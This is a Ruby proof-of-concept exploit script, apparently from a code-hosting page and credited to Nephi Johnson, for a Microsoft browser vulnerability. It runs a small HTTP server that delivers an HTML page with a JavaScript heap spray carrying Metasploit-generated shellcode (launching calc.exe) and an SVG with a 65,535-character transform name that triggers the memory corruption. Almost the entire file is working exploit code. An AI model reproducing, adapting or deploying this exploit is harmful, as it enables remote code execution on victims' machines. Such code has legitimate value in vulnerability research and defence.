127 lines
No EOL
4.5 KiB
Ruby
Executable file
127 lines
No EOL
4.5 KiB
Ruby
Executable file
#!/usr/bin/env ruby
|
|
|
|
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
|
|
# Nephi Johnson
|
|
|
|
require 'socket'
|
|
|
|
def http_send(sock, data, opts={})
|
|
defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
|
|
opts = defaults.merge(opts)
|
|
|
|
code = opts[:code]
|
|
message = opts[:message]
|
|
type = opts[:type]
|
|
|
|
date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
|
|
headers = "HTTP/1.1 #{code} #{message}\r\n" +
|
|
"Date: #{date_str}\r\n" +
|
|
"Content-Length: #{data.length}\r\n" +
|
|
"Content-Type: #{type}\r\n\r\n"
|
|
puts "[+] Sending #{opts[:desc]}"
|
|
sock.write(headers + data) rescue return false
|
|
return true
|
|
end
|
|
|
|
def sock_read(sock, out_str, timeout=5)
|
|
begin
|
|
if Kernel.select([sock],[],[],timeout)
|
|
out_str.replace(sock.recv(1024))
|
|
puts "[+] Received:"
|
|
puts " " + out_str.split("\n")[0]
|
|
return true
|
|
else
|
|
sock.close
|
|
return false
|
|
end
|
|
rescue Exception => ex
|
|
return false
|
|
end
|
|
end
|
|
|
|
port = ARGV[0] || 55555
|
|
|
|
transform_name = "\x21" * 65535
|
|
|
|
svg = <<-SVG
|
|
<?xml version="1.0"?>
|
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
|
|
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
|
|
|
<svg xmlns="http://www.w3.org/2000/svg"
|
|
xmlns:xlink="http://www.w3.org/1999/xlink">
|
|
|
|
<rect x="50" y="50" height="110" width="110"
|
|
style="fill: #ffffff"
|
|
transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
|
|
>
|
|
</rect>
|
|
<text x="100" y="100">CLICK ME</text>
|
|
</svg>
|
|
SVG
|
|
|
|
html = <<-HTML
|
|
<html>
|
|
<body>
|
|
<script>
|
|
<!--
|
|
function str_dup(str, length) {
|
|
var result = str;
|
|
while(result.length < length) {
|
|
result += result;
|
|
}
|
|
return result.substr(result.length - length);
|
|
}
|
|
|
|
var shellcode = unescape("%u9000%u9090%u9090") +
|
|
// msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
|
|
unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
|
|
"%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
|
|
"%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
|
|
"%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
|
|
"%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
|
|
"%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
|
|
"%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
|
|
"%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
|
|
"%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
|
|
"%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
|
|
"%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
|
|
"%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
|
|
"%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
|
|
"%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
|
|
"%u7c96%u0e88");
|
|
var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
|
|
var arr = [];
|
|
for(var i = 0; i < 2000; i++) {
|
|
arr[i] = document.createElement("a");
|
|
arr[i].innerHTML = [base + shellcode].join("");
|
|
}
|
|
-->
|
|
</script>
|
|
<iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
|
|
</body>
|
|
</html>
|
|
HTML
|
|
|
|
puts "[+] Listening on port #{port}"
|
|
puts
|
|
|
|
TCPServer.open(port) do |srv|
|
|
while true
|
|
cli = srv.accept
|
|
req = ""
|
|
next unless sock_read(cli, req, 5)
|
|
while req.length > 0
|
|
if req =~ /GET.*svg/i
|
|
break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
|
|
elsif req =~ /QUIT/
|
|
exit()
|
|
else
|
|
break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
|
|
end
|
|
req = ""
|
|
next unless sock_read(cli, req, 5)
|
|
end
|
|
cli.close rescue next
|
|
end
|
|
end |